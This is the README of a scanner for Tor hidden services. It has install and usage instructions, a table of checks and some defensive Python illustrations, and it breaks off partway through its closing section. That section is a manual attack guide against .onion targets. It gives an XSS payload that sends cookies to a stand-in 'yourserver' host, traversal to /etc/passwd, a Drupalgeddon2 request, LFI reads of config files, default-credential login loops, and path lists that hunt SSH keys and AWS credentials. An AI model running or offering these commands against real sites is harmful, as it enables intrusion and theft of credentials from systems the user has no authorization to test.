Threat Intel tool for scanning .onion infrastructure
Developed for legitimate threat intelligence operations, red team assessments, and forensic investigation of dark web infrastructure. This scanner conducts text-only analysis of Tor hidden services to identify security misconfigurations, exposed sensitive files, and indicators of criminal networks.
```bash
# Clone the repository
git clone https://github.com/ekomsSavior/darkweb_scanner.git
cd darkweb_scanner
# Install dependencies
sudo apt update
sudo apt install tor torify python3-pip -y
pip3 install -r requirements.txt --break-system-packages
```
```bash
# Configure Tor for .onion resolution
sudo nano /etc/tor/torrc
```
Add or uncomment these lines in /etc/tor/torrc:
```
SocksPort 9050
ControlPort 9051
CookieAuthentication 1
DNSPort 5353
DNSListenAddress 127.0.0.1
AutomapHostsOnResolve 1
AutomapHostsSuffixes .exit,.onion
```
Restart Tor:
```bash
sudo systemctl restart tor
sudo systemctl enable tor
```
Start the scanner:
```bash
python3 vulnscan.py
```
Run without interaction:
```bash
# Single target
python3 vulnscan.py -t http://target.onion --batch
# Target list
python3 vulnscan.py -T targets.txt --batch
# Full options
python3 vulnscan.py -T targets.txt --batch -d 2 --delay 2 --timeout 20 -r all
```
Batch mode flags:
| Flag | Description |
|---|---|
| `-t <url>` | Single target URL |
| `-T <file>` | Target list file (one per line) |
| `-d <n>` | Crawl depth (default: 1) |
| `--delay <n>` | Delay between requests in seconds |
| `--timeout <n>` | Request timeout in seconds |
| `-r <fmt>` | Report format: json, text, csv, md, all |
| `--batch` | Run non-interactive |
| Command | Description |
|---|---|
| Target Management | |
| `targets` | Show all loaded targets |
| `add <url>` | Add a target .onion URL |
| `load <file>` | Load targets from file (one per line) |
| `remove <n>` | Remove target by number |
| `clear` | Clear all targets |
| Check Control | |
| `checks` | List all 22 checks with on/off status |
| `enable <n\|all>` | Enable a check or all checks |
| `disable <n\|all>` | Disable a check or all checks |
| `only <1,5,7>` | Enable ONLY listed checks, disable the rest |
| Configuration | |
| `config` | Show current scan configuration |
| `set <key> <val>` | Set config value (delay, threads, timeout, max_depth, etc.) |
| Scanning | |
| `scan` | Start scanning all loaded targets |
| `quickscan <url>` | One-command scan of a single target |
| `resume` | Resume an interrupted scan |
| Reports & Intel | |
| `report [fmt]` | Generate report (text, json, csv, md, all) |
| `identifiers` | Show all extracted identifiers with cross-site flags |
| OPSEC | |
| `rotate` | Manually rotate Tor circuit |
| `status` | Show scanner status, circuit count, interrupted scans |
| `exit` | Exit the scanner |
```
vulnscan> add http://target.onion
vulnscan> checks
vulnscan> only 1,2,3,5,8,12
vulnscan> set delay 2
vulnscan> set max_depth 2
vulnscan> scan
vulnscan> identifiers
vulnscan> report all
vulnscan> exit
```
```
vulnscan> quickscan http://target.onion
```
Clears targets, scans one URL with all enabled checks, done.
The scanner runs checks in this order. Each can be toggled on/off independently.
| # | Check | Description |
|---|---|---|
| 1 | Site Checker | Verifies target is reachable before wasting time on other checks |
| 2 | Clone/Mirror Detector | SHA256 + structural hashing to detect duplicate sites across targets |
| 3 | Page Metadata | Extracts titles, meta tags, author disclosure, language/timezone hints, HTML comments, error page fingerprinting |
| 4 | HTTP Security Headers | HSTS, CSP (with strength analysis), X-Frame-Options, Cache-Control, 15+ info-leak headers |
| 5 | SSL/TLS Certificate Analyzer | Extracts real domains, org names, SANs from certs. Detects .onion→clearnet redirects |
| 6 | Technology Fingerprint | CMS detection (WordPress, Drupal, Joomla) and server software from headers/HTML |
| 7 | Tech Stack Analysis | Programming languages, frameworks, libraries from headers and page content |
| 8 | Cookie Analyzer | Security flags (Secure, HttpOnly, SameSite), session tokens, tracking cookies |
| 9 | WAF Detector | Identifies Cloudflare, Akamai, ModSecurity, Sucuri, Imperva + active SQLi blocking test |
| 10 | HTTP Method Enumeration | Probes PUT, DELETE, TRACE, OPTIONS for dangerous methods |
| 11 | CORS Misconfiguration | Tests wildcard origins, origin reflection, null origin acceptance, credential leaks |
| 12 | Robots & Sitemap Intel | Parses robots.txt disallowed paths and sitemap.xml URLs — what admins hide |
| 13 | Sensitive Files | 160+ paths (.git, .env, backups, configs, admin panels) with SPA false-positive filtering |
| 14 | Directory Listing | Tests 13 common directories for open directory browsing |
| 15 | Open Redirect Detection | Tests 15 redirect parameters and 12 redirect endpoints with canary URL |
| 16 | Form Detector | Finds login forms, file upload forms, hidden inputs (CSRF tokens, session IDs) |
| 17 | JavaScript Analyzer | Extracts API endpoints, hardcoded keys/tokens/credentials, WebSocket URLs, referenced domains |
| 18 | Link Crawler | Follows links to configurable depth, discovers .onion references, flags interesting paths |
| 19 | Com/764 Network Detector | Context-aware CSAM keyword detection with false positive filtering. 70+ keywords from CAHN/FBI/Europol |
| 20 | Session ID Tracker | Extracts Session messenger IDs and correlates across targets |
| 21 | Identity Extractor | Emails, BTC/ETH/XMR wallets, Telegram, Discord, Wickr, PGP fingerprints, .onion links — all cross-site correlated |
| 22 | PGP Key Extractor | Full PGP public key blocks, fingerprints, UIDs (Name \<email>), key IDs, keyserver references |
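Check 2 in the table relies on two different hashes, and the distinction matters for analysts: a plain SHA256 over the body only catches byte-identical copies, while a hash over the tag skeleton catches mirrors whose text differs only in dynamic content (visitor counters, timestamps, per-mirror links). The following is an added illustration of that idea, not the project's clone_detector.py; the hashing scheme, the group output format and the three sample pages are all constructed for this example.

```python
import hashlib
from html.parser import HTMLParser


class _Skeleton(HTMLParser):
    """Record the tag skeleton of a page: tag names and attribute names,
    but no text and no attribute values (those change between mirrors)."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def handle_starttag(self, tag, attrs):
        attr_names = ",".join(sorted(name for name, _ in attrs))
        self.parts.append("<%s %s>" % (tag, attr_names))

    def handle_endtag(self, tag):
        self.parts.append("</%s>" % tag)


def content_hash(html):
    """Exact-match hash: only byte-identical pages collide."""
    return hashlib.sha256(html.encode("utf-8", "replace")).hexdigest()


def structural_hash(html):
    """Skeleton hash: pages with the same markup but different text collide."""
    parser = _Skeleton()
    parser.feed(html)
    parser.close()
    return hashlib.sha256("".join(parser.parts).encode()).hexdigest()


def group_mirrors(pages):
    """pages: dict url -> html. Returns groups of URLs that share a structural
    hash, flagging whether the group is also byte-identical."""
    by_struct = {}
    for url, html in pages.items():
        by_struct.setdefault(structural_hash(html), []).append(url)
    groups = []
    for urls in by_struct.values():
        if len(urls) < 2:
            continue
        exact = len({content_hash(pages[u]) for u in urls}) == 1
        groups.append({"urls": sorted(urls), "exact_clone": exact})
    return groups


# Constructed sample pages: A and B share a template but differ in dynamic
# text, C is an unrelated site. None of these are real services.
_TEMPLATE = ('<html><head><title>%s</title></head><body>'
             '<div class="hdr"><h1>%s</h1></div><p id="ctr">Visitors: %s</p>'
             '<a href="%s">mirror</a></body></html>')
SAMPLE_PAGES = {
    "http://mirror-a.onion": _TEMPLATE % ("Shop", "Shop", "1042", "/m1"),
    "http://mirror-b.onion": _TEMPLATE % ("Shop", "Shop", "1187", "/m2"),
    "http://other.onion": "<html><body><ul><li>one</li><li>two</li></ul></body></html>",
}

if __name__ == "__main__":
    for group in group_mirrors(SAMPLE_PAGES):
        print(group)
```

The structural hash is deliberately loose: two unrelated sites built from the same CMS theme will collide too, so a structural-only match is a lead to corroborate with shared identifiers, not proof of a mirror.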
The scan engine automatically detects when a target is fighting back:
Scan state is saved to state/scan_state.json after every target. If the process dies:
```
$ python3 vulnscan.py
[!] Interrupted scan detected from 2025-03-20 14:32:01
15/40 targets completed, 25 remaining
Resume? (y/n):
```
Type y to pick up where you left off. Type n to discard and start fresh.
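The resume behaviour described above depends on two details a state file must get right: it has to be rewritten after every target (not at the end of the run), and the write itself must not be able to leave a half-written JSON file behind when the process dies mid-save. The following is an added example of that pattern, not the project's core/scan_state.py; the file layout, the class name and the four target URLs are assumptions made for the demonstration.

```python
import json
import os
import tempfile
from datetime import datetime


class ScanState:
    """Progress record rewritten after every target, so a crash loses at most
    the target that was in flight."""

    def __init__(self, path):
        self.path = path
        self.targets = []
        self.completed = []
        self.started = None

    def start(self, targets):
        self.targets = list(targets)
        self.completed = []
        self.started = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        self._save()

    def mark_done(self, target):
        if target not in self.completed:
            self.completed.append(target)
        self._save()

    def remaining(self):
        done = set(self.completed)
        return [t for t in self.targets if t not in done]

    def finish(self):
        """A completed scan leaves no state file behind."""
        if os.path.exists(self.path):
            os.remove(self.path)

    def _save(self):
        # Write to a temporary file and rename it into place: a crash in the
        # middle of the write must never leave a truncated JSON file behind.
        data = {"started": self.started, "targets": self.targets,
                "completed": self.completed}
        directory = os.path.dirname(os.path.abspath(self.path))
        os.makedirs(directory, exist_ok=True)
        fd, tmp = tempfile.mkstemp(dir=directory, suffix=".tmp")
        with os.fdopen(fd, "w") as f:
            json.dump(data, f, indent=2)
        os.replace(tmp, self.path)

    @classmethod
    def load_interrupted(cls, path):
        """Return the saved state if an unfinished scan is on disk, else None."""
        if not os.path.exists(path):
            return None
        try:
            with open(path) as f:
                data = json.load(f)
        except (OSError, ValueError):
            return None  # unreadable or corrupt state file: nothing to resume
        state = cls(path)
        state.started = data.get("started")
        state.targets = data.get("targets", [])
        state.completed = data.get("completed", [])
        return state if state.remaining() else None

    def banner(self):
        return ("[!] Interrupted scan detected from %s\n%d/%d targets completed, %d remaining"
                % (self.started, len(self.completed), len(self.targets),
                   len(self.remaining())))


def demo():
    """Simulate a run that dies after 2 of 4 constructed targets, then a fresh
    process that resumes it. Returns what the second process still had to scan."""
    path = os.path.join(tempfile.mkdtemp(), "scan_state.json")
    targets = ["http://t1.onion", "http://t2.onion", "http://t3.onion", "http://t4.onion"]
    state = ScanState(path)
    state.start(targets)
    state.mark_done(targets[0])
    state.mark_done(targets[1])
    # ... process killed here; a new process starts up and checks for state:
    resumed = ScanState.load_interrupted(path)
    left = resumed.remaining() if resumed else []
    if resumed:
        print(resumed.banner())
        for t in left:
            resumed.mark_done(t)
        resumed.finish()
    return {"remaining_on_resume": left,
            "resumable_after_finish": ScanState.load_interrupted(path) is not None}


if __name__ == "__main__":
    print(demo())
```

Treating a corrupt state file as "nothing to resume" is a deliberate choice: the alternative, crashing at startup, would leave the operator unable to start any scan until they deleted the file by hand.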
Tor circuits can be rotated manually with the `rotate` command; automatic rotation and User-Agent randomization are configured in config/settings.py.
Four report formats, generated to the reports/ directory:
- `report md`: Human-readable with severity icons, findings grouped by check, cross-site identifier correlation section.
- `report json`: Machine-readable with full metadata, summary, cross-site identifiers, and all finding data.
- `report text`: Plain text with severity tags, cross-site section, detailed findings per target.
- `report csv`: Spreadsheet format: Target, Check, Severity, Finding, Detail, URL.
- `report all`: Generates JSON + text + CSV + Markdown simultaneously.
When scanning multiple targets, the scanner tracks identifiers across sites:
The identifiers command shows everything extracted with cross-site flags. Reports include a dedicated cross-site correlation section.
You should customize these for your specific targets.
Threat actors change their language, directory structures, and hiding spots. A wordlist that worked last month might miss things today.
- `wordlists/sensitive_paths.txt`: 160+ file paths to probe. Add your own — one path per line, `#` for comments.
- `wordlists/com764_keywords.txt`: 70+ CSAM/exploitation keywords from CAHN, FBI, and Europol advisories. Supplements the built-in detector keywords.
The scanner loads these files at startup. No code changes needed—just edit and re-run.
Edit config/settings.py for persistent changes:
```python
# Tor connection
TOR_PROXY_PORT = 9050
TOR_CONTROL_PORT = 9051
TOR_PASSWORD = None  # Set if using password auth

# Scan defaults
DEFAULT_SCAN_CONFIG = {
    'delay': 1,                 # Seconds between requests
    'threads': 1,               # 1 = sequential
    'timeout': 15,              # Request timeout
    'rotate_circuit_every': 10,
    'max_depth': 1,             # Crawl depth (1 = homepage only)
    'follow_redirects': True,
    'verify_ssl': False,
}
```
Or set values at runtime:
```
vulnscan> set delay 3
vulnscan> set max_depth 2
vulnscan> set timeout 20
```
```
darkweb_scanner/
├── vulnscan.py                 # CLI + batch mode entry point
├── requirements.txt            # pip dependencies
├── config/
│   └── settings.py             # Tor, scan defaults, User-Agents
├── core/
│   ├── tor_session.py          # SOCKS5 proxy, circuit rotation, UA randomization
│   ├── scan_engine.py          # Orchestration, rate limit detection, crash recovery
│   ├── scan_state.py           # State persistence for crash recovery
│   ├── target_manager.py       # Target loading/management
│   └── report_builder.py       # JSON/text/CSV/Markdown export
├── checks/
│   ├── base_check.py           # Abstract base class
│   ├── site_checker.py         # Reachability check
│   ├── clone_detector.py       # Duplicate site detection
│   ├── page_metadata.py        # Titles, meta, language, timezone, comments
│   ├── security_headers.py     # Headers + CSP analysis + cache + info leaks
│   ├── ssl_analyzer.py         # TLS cert intel extraction
│   ├── fingerprint.py          # CMS/server detection
│   ├── tech_stack.py           # Framework/language detection
│   ├── cookie_analyzer.py      # Cookie security audit
│   ├── waf_detector.py         # WAF identification + active test
│   ├── http_methods.py         # PUT/DELETE/TRACE enumeration
│   ├── cors_check.py           # CORS misconfiguration testing
│   ├── robots_sitemap.py       # robots.txt + sitemap.xml parsing
│   ├── sensitive_files.py      # 160+ path enumeration with SPA filtering
│   ├── directory_listing.py    # Open directory detection
│   ├── open_redirect.py        # Redirect vulnerability testing
│   ├── form_detector.py        # Login/upload/hidden input detection
│   ├── js_extractor.py         # JS endpoint/key/credential extraction
│   ├── link_crawler.py         # Link following + .onion discovery
│   ├── com764_detector.py      # Context-aware CSAM detection
│   ├── session_id_tracker.py   # Session messenger ID correlation
│   ├── identity_extractor.py   # Multi-identifier extraction + correlation
│   ├── pgp_extractor.py        # PGP key block/fingerprint extraction
│   └── port_scan.py            # Optional nmap via proxychains (disabled)
├── wordlists/
│   ├── sensitive_paths.txt     # 160+ sensitive file paths
│   └── com764_keywords.txt     # 70+ CSAM/Com764 keywords
├── data/
│   ├── targets.txt             # Sample targets
│   └── exclude_list.txt        # Safe URLs to skip
├── reports/                    # Generated scan reports
├── state/                      # Crash recovery state files
└── utils/
    ├── helpers.py              # URL normalization, risk scoring
    ├── validators.py           # .onion validation, input sanitization
    └── parsers.py              # PDF/JSON parsing, identifier extraction
```
After identifying vulnerabilities with the scanner, here are manual techniques and tool recommendations to further investigate darkweb sites across different technology stacks.
If a site lacks HTTP Strict Transport Security, you can attempt protocol downgrade attacks:
```bash
# Force HTTP connection to see if site accepts insecure connections
curl -k -L --proxy socks5h://127.0.0.1:9050 http://target.onion
# Check if HTTPS is even supported
curl -k -L --proxy socks5h://127.0.0.1:9050 https://target.onion
# If both work, test for session token leakage over HTTP
curl -v --proxy socks5h://127.0.0.1:9050 http://target.onion/login
```
Without Content Security Policy, test for XSS vulnerabilities:
```bash
# Basic XSS payload test
curl --proxy socks5h://127.0.0.1:9050 "http://target.onion/search?q=<script>alert(1)</script>"
# Try to steal cookies with XSS (requires finding an injection point first)
# Payload: <script>fetch('http://yourserver/steal?cookie='+document.cookie)</script>
```
Test if site can be framed:
```bash
# Create a simple HTML test page
cat > clickjack_test.html << EOF
<html>
<head><title>Clickjack Test</title></head>
<body>
<iframe src="http://target.onion" width="800" height="600"></iframe>
<p>If you see the site above, it's vulnerable to clickjacking</p>
</body>
</html>
EOF
# Serve it locally and access through Tor Browser
python3 -m http.server 8080
# Then visit http://127.0.0.1:8080/clickjack_test.html in Tor Browser
```
If the scanner flags wildcard or reflected origins:
```bash
# Test origin reflection
curl -H "Origin: https://evil.com" -I --proxy socks5h://127.0.0.1:9050 http://target.onion/api/
# Check for credential leakage with CORS
curl -H "Origin: https://evil.com" --proxy socks5h://127.0.0.1:9050 http://target.onion/api/user -v 2>&1 | grep -i "access-control"
# Test null origin (sandboxed iframe bypass)
curl -H "Origin: null" -I --proxy socks5h://127.0.0.1:9050 http://target.onion/api/
```
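The HSTS, CSP, framing, cookie and CORS conditions that checks 4, 8 and 11 report, and that the curl commands above reproduce by hand, can all be decided from captured response headers without touching the target again. The following is an added example of that evaluation, not the project's security_headers.py, cookie_analyzer.py or cors_check.py; the severities, the finding texts and the sample response (a plain-HTTP onion service answering a request that carried a foreign Origin) are constructed for the demonstration.

```python
import re
from http.cookies import SimpleCookie


def _parse_csp(csp):
    """Split a CSP string into {directive: [sources]} (lower-cased)."""
    directives = {}
    for part in csp.split(";"):
        tokens = part.strip().split()
        if tokens:
            directives[tokens[0].lower()] = [t.lower() for t in tokens[1:]]
    return directives


def audit_headers(headers):
    """headers: dict of response header name -> value. Returns (severity, text) pairs."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []
    if "strict-transport-security" not in h:
        findings.append(("MEDIUM", "No HSTS header"))
    csp = h.get("content-security-policy")
    if csp is None:
        findings.append(("HIGH", "No Content-Security-Policy"))
        directives = {}
    else:
        directives = _parse_csp(csp)
        if "default-src" not in directives:
            findings.append(("MEDIUM", "CSP has no default-src fallback"))
        # script-src falls back to default-src when it is absent
        scripts = directives.get("script-src", directives.get("default-src", []))
        for weak in ("'unsafe-inline'", "'unsafe-eval'", "*", "data:", "http:", "https:"):
            if weak in scripts:
                findings.append(("HIGH", "CSP allows %s for scripts" % weak))
    framing = h.get("x-frame-options", "").upper()
    if framing not in ("DENY", "SAMEORIGIN") and "frame-ancestors" not in directives:
        findings.append(("MEDIUM", "Page can be framed: no X-Frame-Options or frame-ancestors"))
    for leak in ("server", "x-powered-by", "x-aspnet-version", "x-generator"):
        if leak in h:
            findings.append(("INFO", "Information leak: %s: %s" % (leak, h[leak])))
    return findings


def audit_cookies(set_cookie_values, https):
    """set_cookie_values: raw Set-Cookie header values. On a plain-HTTP onion
    service the Secure flag changes nothing, so it is only checked for HTTPS."""
    findings = []
    for raw in set_cookie_values:
        jar = SimpleCookie()
        jar.load(raw)
        for name, morsel in jar.items():
            if not morsel["httponly"]:
                findings.append(("MEDIUM", "Cookie %s lacks HttpOnly" % name))
            if https and not morsel["secure"]:
                findings.append(("MEDIUM", "Cookie %s lacks Secure" % name))
            if not morsel["samesite"]:
                findings.append(("LOW", "Cookie %s lacks SameSite" % name))
    return findings


def audit_cors(foreign_origin, headers):
    """headers: the response to a request that carried Origin: <foreign_origin>."""
    h = {k.lower(): v for k, v in headers.items()}
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    findings = []
    if acao == "*":
        findings.append(("MEDIUM", "CORS allows any origin (*)"))
    elif acao == "null":
        findings.append(("HIGH" if creds else "MEDIUM", "CORS accepts the null origin"))
    elif acao and acao == foreign_origin:
        findings.append(("HIGH" if creds else "MEDIUM",
                         "CORS reflects the foreign origin %s" % acao))
    return findings


# Constructed sample response for a plain-HTTP onion service; not from any real site.
SAMPLE_HEADERS = {
    "Server": "nginx/1.18.0",
    "Content-Security-Policy": "script-src 'self' 'unsafe-inline'; object-src 'none'",
    "Access-Control-Allow-Origin": "https://foreign.example",
    "Access-Control-Allow-Credentials": "true",
}
SAMPLE_COOKIES = ["PHPSESSID=c0nstructed; Path=/",
                  "theme=dark; Path=/; Secure; HttpOnly; SameSite=Lax"]


def run_sample():
    return (audit_headers(SAMPLE_HEADERS)
            + audit_cookies(SAMPLE_COOKIES, https=False)
            + audit_cors("https://foreign.example", SAMPLE_HEADERS))


if __name__ == "__main__":
    for severity, text in run_sample():
        print("[%s] %s" % (severity, text))
```

Origin reflection is only rated HIGH when Access-Control-Allow-Credentials is also true, because without credentials a reflected origin exposes nothing a plain unauthenticated request would not.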
If the scanner finds open redirects:
```bash
# Verify the redirect manually
curl -I --proxy socks5h://127.0.0.1:9050 "http://target.onion/login?next=https://evil.com"
# Chain with XSS for credential theft
# http://target.onion/redirect?url=javascript:alert(document.cookie)
```
```bash
# Check nginx version from headers
curl -I --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -i server
# Common nginx paths to check
for path in /nginx_status /status /metrics /nginx.conf .nginx.conf; do
  curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion$path" | head -20
done
# Check for nginx alias traversal vulnerability
curl --proxy socks5h://127.0.0.1:9050 "http://target.onion/assets../etc/passwd"
# Test for off-by-slash path traversal
curl --proxy socks5h://127.0.0.1:9050 "http://target.onion/assets../assets/"
# Look for nginx default error pages that reveal paths
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/nonexistent" | grep -i nginx
```
```bash
# Check Apache version
curl -I --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -i server
# Check for mod_status exposure
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/server-status"
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/server-info"
# Check for .htaccess access
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/.htaccess"
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/.htpasswd"
# Test for CGI exposure
for cgi in /cgi-bin/test.cgi /cgi-bin/printenv /cgi-bin/php; do
  curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion$cgi" | head -20
done
# Check for Apache Tomcat instances
for path in /manager/html /host-manager/html /examples; do
  curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion:8080$path" | head -5
done
```
```bash
# Check IIS version
curl -I --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -i server
# Check for asp.net debug pages
for path in /trace.axd /elmah.axd /web.config /bin; do
  curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion$path" | head -20
done
# Test for short filename disclosure (IIS 8.3)
for i in {a..z}; do
  curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/*~1*$i*" -I | head -1
done
```
```bash
# Check for phpMyAdmin
for path in /phpmyadmin /pma /myadmin /phpMyAdmin /mysql /db; do
  curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion$path/" | grep -i "phpmyadmin\|welcome"
done
# Check for MySQL error exposure
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/index.php?id=1'" | grep -i "mysql\|sql"
# Look for SQL backup files
for file in .sql .bak .backup .dump .sql.gz; do
  for name in backup db database data sql mysql; do
    curl -I --proxy socks5h://127.0.0.1:9050 "http://target.onion/$name$file"
  done
done
# Check for MySQL connection strings in JS files
# wget has no SOCKS support, so an http_proxy=socks5h:// setting never reaches Tor;
# wrap it with torify (installed above) instead
torify wget -r -l2 -A.js http://target.onion/
grep -r -E "(mysql://|mysqli_connect|mysql_connect|localhost.*root)" ./
```
```bash
# Check for pgAdmin
for path in /pgadmin /phppgadmin /pgsql /postgres; do
  curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion$path/" | grep -i "pgadmin\|postgres"
done
# Look for PostgreSQL connection strings
grep -r -E "(postgresql://|postgres://|PGPASSWORD|PGUSER)" ./
```
```bash
# Check for MongoDB web interfaces
for port in 27017 27018 28017; do
  curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion:$port/" | head -10
done
# Look for MongoDB connection strings
grep -r -E "(mongodb://|mongo://|MONGO_URI)" ./
```
```bash
# Check for WordPress
curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -i "wp-content\|wp-includes"
# WordPress vulnerability scanning through Tor
wpscan --url http://target.onion --proxy socks5h://127.0.0.1:9050 --enumerate u,vp
# Check for wp-config.php access
curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion/wp-config.php
# List users
curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion/wp-json/wp/v2/users | jq .
# Check for XML-RPC
curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion/xmlrpc.php -X POST -d "<methodCall><methodName>system.listMethods</methodName></methodCall>"
```
```bash
# Check for Joomla
curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -i "joomla"
# Check for configuration.php
curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion/configuration.php
# Joomla vulnerability scan
joomscan --url http://target.onion --proxy socks5h://127.0.0.1:9050
```
```bash
# Check for Drupal
curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -i "drupal\|sites/default"
# Check for settings.php
curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion/sites/default/settings.php
# Drupalgeddon2 test
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup"
```
Gatsby sites often leak valuable information:
```bash
# Check for exposed page-data (contains site structure)
curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion/page-data/ | grep -o '"path":"[^"]*"'
# Look for component chunks (may contain hardcoded credentials)
curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion/page-data/app-data.json
# Check for GraphQL endpoint
curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion/___graphql -H "Content-Type: application/json" -d '{"query":"{__schema{types{name}}}"}'
# If GraphQL is enabled, dump entire schema
cat > graphql_query.txt << EOF
{"query":"{__schema{types{name,fields{name,type{name}}}}}"}
EOF
curl -X POST --proxy socks5h://127.0.0.1:9050 http://target.onion/___graphql \
  -H "Content-Type: application/json" \
  -d @graphql_query.txt
# Extract JavaScript bundles and search for secrets
# (wget has no SOCKS support, so route it through torify rather than http_proxy)
torify wget -r -l1 -A.js http://target.onion/
grep -r -E "(api[_-]?key|secret|token|password|aws|AKIA)" ./target.onion/
```
```bash
# Check for Flask
curl -I --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -i "flask"
# Look for debug mode
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/notfound" | grep -i "debug"
# Check for Werkzeug debugger
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/console" | grep -i "werkzeug"
# Django admin finder
for path in /admin /dashboard /manage /backend; do
  curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion$path/" | grep -i "django"
done
# Check for Django settings exposure
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/settings.py"
```
```bash
# Check for PHP version
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/phpinfo.php"
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/info.php"
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/test.php"
# Check for PHP session files
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/sessions/"
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/tmp/"
# PHP wrapper exploitation if LFI found
# Example: php://filter/convert.base64-encode/resource=index.php
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/page?file=php://filter/convert.base64-encode/resource=config.php"
# Check for PHPMyAdmin setup
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/phpmyadmin/setup"
```
```bash
# Check for Express
curl -I --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -i "x-powered-by"
# Look for package.json
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/package.json"
# Check for .env file
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/.env"
# Look for server.js/app.js
for file in server.js app.js index.js main.js; do
  curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/$file" | head -20
done
# Check for node_modules exposure
curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/node_modules/"
```
Beyond the scanner's default wordlist, use targeted wordlists:
```bash
# Install tools if needed
sudo apt update && sudo apt install gobuster dirb wfuzz -y
# Use gobuster through Tor
export HTTP_PROXY=socks5h://127.0.0.1:9050
export HTTPS_PROXY=socks5h://127.0.0.1:9050
# Common dark web directories
gobuster dir -u http://target.onion -w /usr/share/wordlists/dirb/common.txt -t 5
# Check for admin panels
gobuster dir -u http://target.onion -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
  -x php,html,txt -p /usr/share/wordlists/dirb/big.txt
# Technology-specific wordlists
cat > tech_paths.txt << EOF
# PHP
/phpinfo.php
/info.php
/test.php
/php.ini
/.user.ini
# Python
/console
/__pycache__
/.python-version
/requirements.txt
/Pipfile
# Node
/package.json
/package-lock.json
/yarn.lock
/node_modules
/.npmrc
# Git
/.git/config
/.git/HEAD
/.git/index
/.gitignore
# Docker
/Dockerfile
/.dockerignore
/docker-compose.yml
# AWS
/.aws/credentials
/.aws/config
# SSH
/.ssh/id_rsa
/.ssh/authorized_keys
/.ssh/config
# Databases
/.sql
/.db
/.sqlite
/.mysql_history
/.psql_history
EOF
gobuster dir -u http://target.onion -w tech_paths.txt -t 5
```
Common admin paths to check manually:
```bash
# Test each path manually
for path in admin administrator adminpanel dashboard manage control backend cms wp-admin; do
  echo -n "Checking /$path... "
  curl -s -o /dev/null -w "%{http_code}" --proxy socks5h://127.0.0.1:9050 \
    "http://target.onion/$path/" && echo ""
done
# Check for default credentials
for cred in admin:admin admin:password admin:123456 administrator:admin root:root; do
  username=$(echo $cred | cut -d: -f1)
  password=$(echo $cred | cut -d: -f2)
  # For basic auth
  curl -u $username:$password --proxy socks5h://127.0.0.1:9050 \
    "http://target.onion/admin/" -I
done
# Test common CMS logins
for path in /wp-login.php /administrator /user/login /login.php; do
  curl -X POST --proxy socks5h://127.0.0.1:9050 \
    -d "log=admin&pwd=admin" \
    "http://target.onion$path" -I
done
```
Gatsby, React, Vue and other SPAs often have hidden routes in JavaScript:
```bash
# Download all JavaScript files
# (wget has no SOCKS support, so route it through torify rather than http_proxy)
torify wget -r -l2 -A.js,js.map http://target.onion/
# Extract routes from JS files
find target.onion -name "*.js" -exec grep -o -E "path:['\"]([^'\"]+)['\"]|route:['\"]([^'\"]+)['\"]" {} \; | sort -u
# Look for React Router routes
grep -r -E "path=['\"]\/[a-zA-Z0-9_\/-]+['\"]" target.onion/
# Vue routes
grep -r -E "name: ['\"][a-zA-Z0-9_-]+['\"]" target.onion/
# Angular routes
grep -r -E "path: ['\"][a-zA-Z0-9_\/-]+['\"]" target.onion/
# Extract all strings that look like URLs
find target.onion -name "*.js" -exec strings {} \; | grep -E "https?://[^\"'\\s]+" | sort -u
# Look for API endpoints
grep -r -E "fetch\(['\"]([^'\"]+)['\"]|axios\.(get|post)\(['\"]([^'\"]+)['\"]" target.onion/
```
Check JavaScript bundles and config files for leaked secrets:
```bash
# Download and search JS files
# (wget has no SOCKS support, so route it through torify rather than http_proxy)
torify wget -r -l2 -A.js http://target.onion/
# Search for common environment variable patterns
